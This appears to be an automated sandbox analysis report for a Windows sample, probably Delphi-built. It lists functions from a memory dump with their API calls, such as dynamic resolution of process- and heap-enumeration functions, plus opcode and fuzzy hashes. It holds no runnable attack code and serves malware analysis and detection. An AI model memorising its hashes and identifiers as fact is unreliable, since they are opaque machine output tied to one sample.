                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                  • Instruction ID: d7cffd8e024f7b8f43385001079872a4dbc1099a3c00f1deb60213e392578619
                                                                                                                  • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                  • Instruction Fuzzy Hash: 16C08CE22012000A5A5069BC2CC428952CE8B042383F40AE1A438C72E6DB2298A63850
                                                                                                                  Function 02B14C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3341692771-0
                                                                                                                  • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                  • Instruction ID: b8adcb66bebd1b3e48b5fa80b4c996f08707cfa31f9fb7caba0fef6273ec1ac8
                                                                                                                  • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                  • Instruction Fuzzy Hash: 55C012A26102305BEB219AA9ACC0B5262ECDB093A9B9800E1A908DB254E36498008AA0
                                                                                                                  Function 02B3C35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • timeSetEvent.WINMM(00002710,00000000,02B3C350,00000000,00000001), ref: 02B3C36C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Eventtime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2982266575-0
                                                                                                                  • Opcode ID: a137e6f06a96d74b7f3f0bdf43336006e5c015fd4fa38c76e488d3fdd41733e3
                                                                                                                  • Instruction ID: 39911893dd863e4479374ed1cf27a7928856dffec38f1e797a8c7f914e773a37
                                                                                                                  • Opcode Fuzzy Hash: a137e6f06a96d74b7f3f0bdf43336006e5c015fd4fa38c76e488d3fdd41733e3
                                                                                                                  • Instruction Fuzzy Hash: CEC092F27D03003AFA1196A55CC2F732A9DD705B14F608592B704FE2C1D2F36C104E68
                                                                                                                  Function 02B14C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02B14C3F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2525500382-0
                                                                                                                  • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                  • Instruction ID: 80e7b4fa2771d971173456c0e5e36c09b9ea44270529d425196c900267da826c
                                                                                                                  • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                  • Instruction Fuzzy Hash: FDB0127421C24116FE5C22620F00773009C8B41386FC800D19F18C80D0FB04C0018835
                                                                                                                  Function 02B14C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02B14C57
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3341692771-0
                                                                                                                  • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                  • Instruction ID: 7fab6391d8bb3388698cf6e1a0aeee282a6f682a804cd6c57ff98dd133c6f0ed
                                                                                                                  • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                  • Instruction Fuzzy Hash: A1A011A82002020A8A0A222C002002A2232AFC23003C8C0E80A000A0008A2A8000A8A0
                                                                                                                  Function 02B115CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B11A03,?,02B12000), ref: 02B115E2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: add1d25e9b06a38976e9739ab60de12cb0c8c68fa94a6485f583b1dc406359c0
                                                                                                                  • Instruction ID: 03fe3878f1d59a8ade3a4162fc87491624ccb50e7479ac0ca99848020e6f1941
                                                                                                                  • Opcode Fuzzy Hash: add1d25e9b06a38976e9739ab60de12cb0c8c68fa94a6485f583b1dc406359c0
                                                                                                                  • Instruction Fuzzy Hash: AEF04FF0B513004FDB09CFB99A503017BF2E78A388F508579D609DB384E77684028B00
                                                                                                                  Function 02B11682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B12000), ref: 02B116A4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: e687c5fe1affb83ddd0f8a8948e26b7330121b7f1f5df0ed158d2557d344ef44
                                                                                                                  • Instruction ID: 2fea4167986781ebe706da96ff5ffa9d6f742aa5bbf9454daf73e14205420667
                                                                                                                  • Opcode Fuzzy Hash: e687c5fe1affb83ddd0f8a8948e26b7330121b7f1f5df0ed158d2557d344ef44
                                                                                                                  • Instruction Fuzzy Hash: E2F0BEB2B407956BDB109F6E9C80B82BB98FB003A4F454179FA4CDB340D776A8108BD4
                                                                                                                  Function 02B116E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B11FE4), ref: 02B11704
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1263568516-0
                                                                                                                  • Opcode ID: 97f519263cb5df7011c1af165be911f97bbda741756247ca3623780b237330ed
                                                                                                                  • Instruction ID: 86618f5e5291e47f99156ca1a41058ff12f6aa9fbee49080096b6405d6bf4e10
                                                                                                                  • Opcode Fuzzy Hash: 97f519263cb5df7011c1af165be911f97bbda741756247ca3623780b237330ed
                                                                                                                  • Instruction Fuzzy Hash: C5E0C2B5320301AFEB105F7E5D80B12BBDCEF48664FA444BAF749DB381D2A0E8108B64

                                                                                                                  Non-executed Functions

                                                                                                                  Function 02B2AB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B2ADA3,?,?,02B2AE35,00000000,02B2AF11), ref: 02B2AB30
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B2AB48
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B2AB5A
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B2AB6C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B2AB7E
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B2AB90
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B2ABA2
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B2ABB4
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B2ABC6
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B2ABD8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B2ABEA
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B2ABFC
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B2AC0E
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B2AC20
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B2AC32
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B2AC44
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B2AC56
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                  • API String ID: 667068680-597814768
                                                                                                                  • Opcode ID: e221cf159f21c2b11cdf0c78b245a353d1add516cfbe8ce126889cb33164d392
                                                                                                                  • Instruction ID: 9850fc4cf9ed551eaefa7cc161c4787925d1fdafef42a73977c19078ce779546
                                                                                                                  • Opcode Fuzzy Hash: e221cf159f21c2b11cdf0c78b245a353d1add516cfbe8ce126889cb33164d392
                                                                                                                  • Instruction Fuzzy Hash: 3B3114F0A91360AFEF00EBB4D985A6977E8EB16781B401DE1F805CF219EA74E804DF11
                                                                                                                  Function 02B15908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15925
                                                                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B1593C
                                                                                                                  • lstrcpynA.KERNEL32(?,?,?), ref: 02B1596C
                                                                                                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B159D0
                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A06
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A19
                                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A2B
                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A37
                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000), ref: 02B15A6B
                                                                                                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C), ref: 02B15A77
                                                                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B15A99
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                  • API String ID: 3245196872-1565342463
                                                                                                                  • Opcode ID: c4cff8e046979f3f225ec367358ea433210ad60c419e9a9d5ed35ed01914e410
                                                                                                                  • Instruction ID: 905c21ffe8dacf7c1d34f93c8a29a4feee15821d9281af3665a937d068eacd2e
                                                                                                                  • Opcode Fuzzy Hash: c4cff8e046979f3f225ec367358ea433210ad60c419e9a9d5ed35ed01914e410
                                                                                                                  • Instruction Fuzzy Hash: 9A418171E10619AFDB20DAE8CC88ADEB3BDEF48340FC445E5A658E7245E774DA448F90
                                                                                                                  Function 02B15BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B15BE8
                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B15BF5
                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B15BFB
                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B15C26
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15C6D
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15C7D
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15CA5
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15CB5
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B15CDB
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B15CEB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                  • API String ID: 1599918012-2375825460
                                                                                                                  • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                  • Instruction ID: 62d51a6d47bec3f5ff2a09b0e2781232562ec7bd0e096047ac09988cb12e3b6a
                                                                                                                  • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                  • Instruction Fuzzy Hash: 1B318471E4026C6AEB35DAB89C85FDF77AD9B44380FC401E29648E6181DB749F848F90
                                                                                                                  Function 02B17FD2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B17FF5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DiskFreeSpace
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1705453755-0
                                                                                                                  • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                  • Instruction ID: d1b01f7b7ecbb76af78f08fd2bddc1c0b1fe0ed451d2bfef95bd40ca9d615cc0
                                                                                                                  • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                  • Instruction Fuzzy Hash: A311C0B5A00209AF9B04CF99C881DBFF7F9FFC8300B54C569A509E7254E6719A018B90
                                                                                                                  Function 02B1A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2299586839-0
                                                                                                                  • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                  • Instruction ID: 2c0be3ec501732e34097e27960e5e910dff8cef024a2f81397b4d0f33d2c2540
                                                                                                                  • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                  • Instruction Fuzzy Hash: 0BE0D871B0021417D311A5589C80EF6736D9B58310F8042FABD15C7385EDE0AE848BE4
                                                                                                                  Function 02B1B78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetVersionExA.KERNEL32(?,02B3D106,00000000,02B3D11E), ref: 02B1B79A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Version
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1889659487-0
                                                                                                                  • Opcode ID: 1ca47c8ba3a81762b4421bee666ac1a0309ecbeb84c6d260fdcdcd5bc6f48df8
                                                                                                                  • Instruction ID: 912d13be15c01edde08139fe5364f143dfaa3b64daf79b64149dd6a9a1cbc3a1
